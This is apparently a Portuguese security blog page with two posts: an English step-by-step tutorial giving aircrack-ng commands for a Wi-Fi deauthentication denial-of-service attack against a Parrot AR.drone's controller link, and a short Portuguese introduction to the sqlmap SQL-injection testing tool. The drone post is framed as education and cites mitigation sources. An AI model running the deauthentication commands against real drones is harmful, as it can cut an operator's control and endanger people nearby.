Arquivo da categoria: Segurança

Parrot AR.drone Denial of Service (DoS) Attack

Parrot AR.drone platform is one of best sellers commercial drones/UAS platform.
This article aims to demonstrante the attack similar to the one published by JOHN HOPKINS:

This kind of attack shows the importance of cybersecurity during design of these platforms and its safety implications.

This attack called denial of service (more info) is called “Deauthentication/Dissociation” attack, this attack aims to deauthenticate the client (normally a mobile phone as controller) connected to AR.drone.


** FOR EDUCATION PURPOSE **

Step #0 Put wireless adapter on monitor mode

airmon-ng start wlan0

Step #1 Discover AR.Drone MAC address

airodump-ng wlan0mon

//In this case: 90:03:B7:38:F5:B8

Step #2 Discover the client connected to AR.drone BSSID

airodump-ng wlan0mon -c 1 –bssid 90:03:B7:38:F5:B8

//In this case: 44:80:EB:00:0B:41

Step #3 Use aireplay-ng to disassociate the client

aireplay-ng -0 1000 -a 90:03:B7:38:F5:B8 -c 44:80:EB:00:0B:41 wlan0mon

-0 is the parameter for the Deauthentication attack, 1000 is the number os deaths, -a MAC address of Parrot AR.drone, -c the MAC address of the client and the wlan0mon the interface.


Video of attack:

Denial of Service Attack Result:

Parrot AR.Drone Denial of Service Attack
Parrot AR.Drone Denial of Service Attack

References:
SANS Whitepaper – Wireless Denial Service Attacks Mitigation

Cyber Security Labs – Deauthentication/Disassociation attack

 

Conhecendo o sqlmap – SQL Injection

Neste artigo vou apresentar o sqlmap (sqlmap.org).

sqlmap é uma ferramenta open-source para auditar sites com relação a sua susceptibilidade ou não a ataques de intrusão via SQL injection.  Sendo muito útil durante análises de pentest, automatizando este processo fazendo verificações para os mais diversos vendors de servidores SQL e também formas de ataque.

O requisito principal para utilização do sqlmap é que o local onde você escolher para executá-lo já tenha o Python instalado.

Sua instalação nesse caso é muito simples, basta acessar o site sqlmap.org, escolher a versão zipada ou tarball (.tar.gz), descompactar em uma pasta e então acessar através do terminal de comandos e executar o script sqlmap.py com o Python.

sqlmap "Hello World"
sqlmap “Hello World”

Para uma noção das opções, basta digitar o comando: python sqlmap.py -h

Agora um exemplo simples de avaliação de susceptibilidade a SQL Injection em um site:

Uso do sqlmap
Uso do sqlmap

Mais informações:
sqlmap Wiki: https://github.com/sqlmapproject/sqlmap/wiki
sqlmap FAQ: https://github.com/sqlmapproject/sqlmap/wiki/FAQ